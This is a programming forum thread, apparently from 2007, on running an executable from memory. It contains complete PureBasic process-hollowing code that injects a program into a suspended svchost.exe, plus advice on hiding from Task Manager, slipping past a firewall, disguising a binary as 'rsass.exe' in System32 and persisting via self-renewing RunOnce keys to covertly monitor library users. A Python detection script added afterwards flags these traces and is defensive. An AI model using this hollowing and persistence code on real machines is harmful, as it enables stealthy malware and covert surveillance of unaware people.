
Execute EXE from memory Lib
Here:
http://www.purebasic.fr/german/viewtopic.php?t=9172
in the German forum is code to execute a program from memory.
Works pretty good.
If you start the program like RINGS suggested you don't see "Notepad" in the "Task Manager" anymore.
fsw wrote:
> Here:
> http://www.purebasic.fr/german/viewtopic.php?t=9172
> in the German forum is code to execute a program from memory.
> Works pretty good.
> If you start the program like RINGS suggested you don't see "Notepad" in the "Task Manager" anymore.

Interesting!
How to know the path to iexplore.exe? Registry?
Just run it like this:
Code:
RunProgram("iexplore.exe","","")
You don't need a valid path since it is added in the environment path.
None are more hopelessly enslaved than those who falsely believe they are free. (Goethe)
@ricardo is it important that it is iexplorer? Otherwise you could use Explorer.exe
and get the drive letter with GetWindowsDirectory(
Code:
WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
injectfile(WinPath.s+"\explorer.exe",buffer)
Oops. It's Maxus' topic, maybe there should be a new topic for the German code
Best Henrik
Henrik wrote:
> @ricardo is it important that it is iexplorer? Otherwise you could use Explorer.exe
> and get the drive letter with GetWindowsDirectory(
> Code:
> WinPath.s = Space(#MAX_PATH)
> GetWindowsDirectory_(WinPath.s,#MAX_PATH)
> injectfile(WinPath.s+"\explorer.exe",buffer)
> Oops. It's Maxus' topic, maybe there should be a new topic for the German code
> Best Henrik

Thanks for your answer.
Yes, the best solution is using iexplore.exe, at least if you want to use this option to create some 'parental control' to surfing.
Kids will not notice that some additional process is running if it shows as iexplore.exe, I guess.
Inf0Byt3 wrote:
> Just run it like this:
> Code:
> RunProgram("iexplore.exe","","")
> You don't need a valid path since it is added in the environment path.

Yes, but it's for the code they showed in German forum. Really nice code!!
@ricardo Oh it was something about a school ?
Well, is it XP boxes you're running? Then why not use "svchost.exe" instead of iexplorer, and use regedit "RunOnce"
this i used when you install and you need to reboot the box and run right away when Windows starts again.
When I do this even my ZAPro doesn't complain about the injection.
But the RunOnce gets deleted after the program has run.
Let's say you compiled your program as "rsass.exe" 'cause it sounds like something that could be in the "%systemroot%\System32\" folder, then copy your rsass.exe to the ..\windows\System32\rsass.exe
And it will run immediately when Windows starts up, and just before rsass.exe ends it sets a new RunOnce in the reg.
You need of course to run this code once first time and then reboot your system.
Oh and another thing, it doesn't show up in "msconfig -> Start" 'cause it was only meant to be used once, but who cares about that
Best Henrik

Code:
;// Execute an EXE file from RAM!
;// From the German forum:
;// http://www.purebasic.fr/german/viewtopic.php?t=9172&postdays=0&postorder=asc&start=0
Prototype.l ZwUnmapViewOfSectionPT(Processhandle.l,BaseAdress.l)
ntdll = GetModuleHandle_("ntdll.dll")
Global ZwUnmapViewOfSection_.ZwUnmapViewOfSectionPT = GetProcAddress_(ntdll,"ZwUnmapViewOfSection")
Global WinPath.s
Structure IMAGE_SECTION_HEADER
  Name.b[8]
  StructureUnion
    PhysicalAddress.l
    VirtualSize.l
  EndStructureUnion
  VirtualAddress.l
  SizeOfRawData.l
  PointerToRawData.l
  PointerToRelocations.l
  PointerToLinenumbers.l
  NumberOfRelocations.w
  NumberOfLinenumbers.w
  Characteristics.l
EndStructure
Procedure injectfile(lpProcessname.s, lpBuffer.l)
  ;Declare
  Structure IMAGE_SECTION_HEADERS
    a.IMAGE_SECTION_HEADER[95]
  EndStructure
  Result.l = 0
  Startupinfo.STARTUPINFO
  ProcessInfo.PROCESS_INFORMATION
  Context.CONTEXT
  BaseAddress.l
  lpNumberOfBytesRead.l
  lpNumberOfBytesWritten.w
  *NtHeaders.IMAGE_NT_HEADERS
  *Sections.IMAGE_SECTION_HEADERS
  i.l
  ;---
  Result = #False
  ZeroMemory_(@StartupInfo, SizeOf(STARTUPINFO));
  StartupInfo\cb = SizeOf(STARTUPINFO)
  StartupInfo\dwFlags = #STARTF_USESHOWWINDOW
  StartupInfo\wShowWindow = #SW_SHOW
  If CreateProcess_(lpProcessname,#NUL,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)
    ;If CreateProcess_(#NUL,lpProcessname,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)
    Context\ContextFlags = #CONTEXT_INTEGER
    GetThreadContext_(ProcessInfo\hThread, Context);
    ReadProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesRead)
    If ZwUnmapViewOfSection_(ProcessInfo\hProcess,BaseAddress) >= 0
      *adr.IMAGE_DOS_HEADER = lpBuffer
      *NtHeaders = lpBuffer + *adr\e_lfanew
      BaseAddress = VirtualAllocEx_(ProcessInfo\hProcess,*NtHeaders\OptionalHeader\ImageBase,*NtHeaders\OptionalHeader\SizeOfImage,#MEM_RESERVE | #MEM_COMMIT, #PAGE_READWRITE)
      WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress,lpBuffer,*NtHeaders\OptionalHeader\SizeOfHeaders,@lpNumberOfBytesWritten)
      *Sections = @*NtHeaders\OptionalHeader + *NtHeaders\FileHeader\SizeOfOptionalHeader
      For i = 0 To *NtHeaders\FileHeader\NumberOfSections-1
        WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress+*Sections\a[i]\VirtualAddress,lpBuffer+*Sections\a[i]\PointerToRawData,*Sections\a[i]\SizeOfRawData,@lpNumberOfBytesWritten)
      Next
      WriteProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesWritten)
      Context\Eax = BaseAddress + *NtHeaders\OptionalHeader\AddressOfEntryPoint
      Result = SetThreadContext_(ProcessInfo\hThread, Context)
      If Result
        ResumeThread_(ProcessInfo\hThread)
      Else
        TerminateProcess_(ProcessInfo\hProcess, 0);
        CloseHandle_(ProcessInfo\hProcess)
        CloseHandle_(ProcessInfo\hThread)
      EndIf
    EndIf
  EndIf
EndProcedure
WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
If ReadFile(0,WinPath.s+"\System32\notepad.exe")
  buffer = AllocateMemory(Lof(0)) ; read the file into a buffer in the normal way
  ReadData(0,buffer,Lof(0))
  CloseFile(0)
EndIf
injectfile(WinPath.s+"\System32\svchost.exe",buffer) ; now we run the buffer in the address space of paint!
Delay(1000)
If RegCreateKeyEx_(#HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\RunOnce", 0, 0, #REG_OPTION_NON_VOLATILE, #KEY_ALL_ACCESS, 0, @NewKey, @KeyInfo) = #ERROR_SUCCESS
  StringBuffer$ = WinPath.s+"\System32\rsass.exe" ; change Path to a string with the full path to your program!!!
  RegSetValueEx_(NewKey, "TestRsass", 0, #REG_SZ, StringBuffer$, Len(StringBuffer$)+1) ; change "Programname" to your individual name
  RegCloseKey_(NewKey)
EndIf
; Filename.s=Space(1024)
; myFilename=GetModuleFileName_(0,Filename,1024)
; injectfile(Filename,buffer) ; now we run the buffer in the address space of ourselves (copy)!
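
How the behaviour in the post above looks from the monitoring side, as an added example that is not part of any forum post: three triage rules over process-creation and registry events (svchost.exe with a parent other than services.exe, a file name one character away from a system binary, and a RunOnce value being written). The event field names, the `SYSTEM_NAMES` list and the sample events are assumptions constructed for illustration.

```python
# Added example; event field names and the sample events are constructed.
import ntpath

SYSTEM_NAMES = {"lsass.exe", "csrss.exe", "smss.exe", "svchost.exe",
                "services.exe", "winlogon.exe", "explorer.exe"}
EXPECTED_PARENT = {"svchost.exe": {"services.exe"}}  # normal launcher of svchost
RUNONCE = r"\Software\Microsoft\Windows\CurrentVersion\RunOnce"
SYS32 = "C:\\Windows\\System32\\"

def edit_distance(a, b):
    """Levenshtein distance, used to spot near-miss system file names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike(path):
    """Return the system binary name a file imitates, or None."""
    name = ntpath.basename(path).lower()
    if name in SYSTEM_NAMES:
        return None
    return next((s for s in sorted(SYSTEM_NAMES) if edit_distance(name, s) == 1), None)

def triage(event):
    """Return the findings for one process-creation or registry event."""
    findings = []
    if event["type"] == "process_create":
        image = ntpath.basename(event["image"]).lower()
        parent = ntpath.basename(event["parent"]).lower()
        # Images without an entry in EXPECTED_PARENT are never flagged here.
        if parent not in EXPECTED_PARENT.get(image, {parent}):
            findings.append(f"{image} started by unexpected parent {parent}")
        hit = lookalike(event["image"])
        if hit:
            findings.append(f"{image} imitates {hit}")
    elif event["type"] == "registry_set" and RUNONCE.lower() in event["key"].lower():
        hit = lookalike(event["data"])
        note = f", target imitates {hit}" if hit else ""
        findings.append(f"RunOnce value {event['value']!r} set{note}")
    return findings

EVENTS = [  # constructed: svchost with odd parent, normal svchost, RunOnce write
    {"type": "process_create", "image": SYS32 + "svchost.exe", "parent": SYS32 + "rsass.exe"},
    {"type": "process_create", "image": SYS32 + "svchost.exe", "parent": SYS32 + "services.exe"},
    {"type": "registry_set", "key": "HKLM" + RUNONCE, "value": "TestRsass", "data": SYS32 + "rsass.exe"},
]
```

Running `triage` over each entry of `EVENTS` flags the first and third event and leaves the services.exe-launched svchost.exe alone.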
Henrik wrote:
> @ricardo Oh it was something about a school ?

It's about a public library in my town, mainly used by teenagers and they are damn smart!
That's why I guess if the app is run as iexplore.exe it will be harder for them to notice that there is something unusual running. But I need to find a way to know the path to iexplore.exe because I'm not sure it's always in the same path.
Thanks for your help and comments!!

Look in first Post. Link is Work.
Last edited by Maxus on Wed Jul 25, 2007 6:41 am, edited 1 time in total.
Sorry my English, I'm Russian
AMT Laboratory